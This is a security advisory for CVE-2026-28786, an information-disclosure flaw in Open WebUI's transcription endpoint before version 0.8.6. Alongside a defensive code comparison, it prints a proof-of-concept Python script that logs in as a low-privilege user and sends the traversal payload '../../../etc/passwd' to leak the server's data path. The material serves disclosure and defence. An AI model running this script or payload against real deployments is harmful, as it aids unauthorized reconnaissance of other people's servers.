Security Vulnerability Report
CVE-2026-28786 CVSS 4.3 MEDIUM

Published: 2026-03-27 00:16:23
Last Modified: 2026-03-30 17:25:25

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an unsanitized filename field in the speech-to-text transcription endpoint allows any authenticated non-admin user to trigger a `FileNotFoundError` whose message — including the server's absolute `DATA_DIR` path — is returned verbatim in the HTTP 400 response body, confirming information disclosure on all default deployments. Version 0.8.6 patches the issue.
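The description names two separate defects: a filename that is used without validation, and an exception message that is copied verbatim into the 400 body. The following is an added illustration in plain Python, not Open WebUI's own code, showing the leaky pattern beside a hardened one; `DATA_DIR`, the handler names and the input names are assumptions made for the example.

```python
import logging
import os
from pathlib import Path
from typing import Optional, Tuple

# Constructed for this illustration; a real deployment's DATA_DIR is a server-side path.
DATA_DIR = "/app/backend/data"
log = logging.getLogger("transcription")


def transcribe_leaky(filename: str) -> Tuple[int, dict]:
    """Vulnerable pattern: the exception text (with the absolute path) reaches the client."""
    try:
        with open(os.path.join(DATA_DIR, filename), "rb") as f:
            return 200, {"text": f"<transcript of {len(f.read())} bytes>"}
    except FileNotFoundError as exc:
        # str(exc) is "[Errno 2] No such file or directory: '/app/backend/data/...'"
        return 400, {"detail": str(exc)}


def safe_name(filename: str) -> Optional[str]:
    """Accept only a bare file name: no separators, no traversal, no NUL bytes."""
    if not filename or filename != os.path.basename(filename):
        return None
    if filename in (".", "..") or "\x00" in filename:
        return None
    return filename


def transcribe_hardened(filename: str) -> Tuple[int, dict]:
    """Hardened pattern: validate the name, confine the path, keep exception text server-side."""
    name = safe_name(filename)
    if name is None:
        return 400, {"detail": "invalid filename"}
    base = Path(DATA_DIR).resolve()
    target = (base / name).resolve()
    if base not in target.parents:  # defence in depth: the resolved path must stay under DATA_DIR
        return 400, {"detail": "invalid filename"}
    try:
        with open(target, "rb") as f:
            return 200, {"text": f"<transcript of {len(f.read())} bytes>"}
    except FileNotFoundError as exc:
        log.warning("transcription input missing: %s", exc)  # the path stays in server logs only
        return 400, {"detail": "file not found"}
```

Detecting the leaky variant from the outside is easy: a 400 body containing the server's absolute data directory, which is exactly what the advisory describes.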

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:* - VULNERABLE
Open WebUI < 0.8.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_host = "http://target-open-webui-instance.com"
login_url = f"{target_host}/api/login"
transcribe_url = f"{target_host}/api/v1/transcribe"  # Hypothetical endpoint

# Attacker credentials (low-privilege user)
creds = {"username": "attacker", "password": "password123"}


def exploit():
    session = requests.Session()

    # Step 1: Authenticate
    print("[*] Attempting to login...")
    login_resp = session.post(login_url, json=creds)
    if login_resp.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Login successful")

    # Step 2: Trigger the vulnerability
    # Sending a malformed filename to trigger the FileNotFoundError.
    # (The original wrote `"../../../etc/passwd" or "non_existent_file_12345.txt"`,
    # which always evaluates to the first literal; either name triggers the error.)
    payload = {"filename": "../../../etc/passwd"}
    print("[*] Sending malicious payload to transcription endpoint...")
    vuln_resp = session.post(transcribe_url, data=payload)

    # Step 3: Check for information disclosure
    if vuln_resp.status_code == 400:
        print("[+] Received HTTP 400 response. Checking body...")
        response_text = vuln_resp.text
        # Loose heuristic: any "/" in the body counts as a path, so expect false positives.
        if "DATA_DIR" in response_text or "/" in response_text:
            print("[!] Vulnerability Confirmed! Sensitive path found in response:")
            print(response_text)
        else:
            print("[-] Path not found in response.")
    else:
        print(f"[-] Unexpected status code: {vuln_resp.status_code}")


if __name__ == "__main__":
    exploit()
```

Weaknesses

CWE-22 (Path Traversal), CWE-209 (Generation of Error Message Containing Sensitive Information)

References

https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h (Vendor Advisory, Exploit)